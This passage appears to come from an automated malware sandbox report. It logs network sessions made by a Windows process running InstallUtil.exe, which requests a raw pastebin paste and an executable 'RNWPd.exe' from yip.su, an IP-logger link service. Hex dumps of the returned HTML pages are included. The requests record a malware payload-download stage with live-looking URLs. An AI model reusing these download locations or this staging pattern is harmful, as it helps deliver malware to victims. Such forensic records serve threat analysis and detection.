                            2024-09-10 16:21:59 UTC473INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                            Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                            2024-09-10 16:21:59 UTC1369INData Raw: 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f
                            Data Ascii: content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta property="o
                            2024-09-10 16:21:59 UTC1369INData Raw: 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 34 73
                            Data Ascii: r:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-delay:0.4s
                            2024-09-10 16:21:59 UTC1369INData Raw: 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d 65 29 3b 5f 79 2e
                            Data Ascii: ntData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(name);_y.
                            2024-09-10 16:21:59 UTC1369INData Raw: 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 72 2d 72 61 64 69
                            Data Ascii: e>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;border-radi
                            2024-09-10 16:21:59 UTC1369INData Raw: 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 64 6f 6d 61
                            Data Ascii: gin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="doma
                            2024-09-10 16:21:59 UTC152INData Raw: 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: osition='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                            2024-09-10 16:21:59 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            23192.168.2.1149735104.20.3.2354437848C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                            TimestampBytes transferredDirectionData
                            2024-09-10 16:22:04 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                            Host: pastebin.com
                            Connection: Keep-Alive
                            2024-09-10 16:22:04 UTC222INHTTP/1.1 200 OK
                            Date: Tue, 10 Sep 2024 16:22:04 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Frame-Options: SAMEORIGIN
                            Server: cloudflare
                            CF-RAY: 8c10c1345f348c69-EWR
                            2024-09-10 16:22:04 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                            Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                            2024-09-10 16:22:04 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                            Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                            2024-09-10 16:22:04 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                            Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                            2024-09-10 16:22:04 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                            Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                            2024-09-10 16:22:04 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            24192.168.2.1149736188.114.97.34437848C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                            TimestampBytes transferredDirectionData
                            2024-09-10 16:22:04 UTC65OUTGET /RNWPd.exe HTTP/1.1
                            Host: yip.su
                            Connection: Keep-Alive
                            2024-09-10 16:22:04 UTC900INHTTP/1.1 200 OK
                            Date: Tue, 10 Sep 2024 16:22:04 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            memory: 0.36197662353515625
                            expires: Tue, 10 Sep 2024 16:22:04 GMT
                            strict-transport-security: max-age=604800
                            strict-transport-security: max-age=31536000
                            content-security-policy: img-src https: data:; upgrade-insecure-requests
                            x-frame-options: SAMEORIGIN
                            Cache-Control: max-age=14400
                            CF-Cache-Status: HIT
                            Age: 0
                            Last-Modified: Tue, 10 Sep 2024 16:22:04 GMT
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=juyDjK6qVJpD0CNdE5RNFBpItOvHLtbusYK%2Bm74qb9f6%2F08sol5sciZyqr90OxNYm2JKjbIrdJYvZWdNPqfb9TwWkWd3QUwM6sbZRq2oKSXNuT8xnaES98Q%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8c10c13868951795-EWR
                            alt-svc: h3=":443"; ma=86400
                            2024-09-10 16:22:04 UTC469INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                            Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                            2024-09-10 16:22:04 UTC1369INData Raw: 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74
                            Data Ascii: ter" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta propert
                            2024-09-10 16:22:04 UTC1369INData Raw: 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a
                            Data Ascii: color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-delay:
                            2024-09-10 16:22:04 UTC1369INData Raw: 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d 65 29
                            Data Ascii: rAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(name)
                            2024-09-10 16:22:04 UTC1369INData Raw: 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 72 2d
                            Data Ascii: style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;border-
                            2024-09-10 16:22:04 UTC1369INData Raw: 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22
                            Data Ascii: ;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="
                            2024-09-10 16:22:04 UTC156INData Raw: 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: le.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                            2024-09-10 16:22:04 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            25192.168.2.1149737104.20.3.2354437848C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                            TimestampBytes transferredDirectionData
                            2024-09-10 16:22:09 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                            Host: pastebin.com
                            Connection: Keep-Alive
                            2024-09-10 16:22:10 UTC222INHTTP/1.1 200 OK
                            Date: Tue, 10 Sep 2024 16:22:09 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Frame-Options: SAMEORIGIN
                            Server: cloudflare
                            CF-RAY: 8c10c15859380f59-EWR
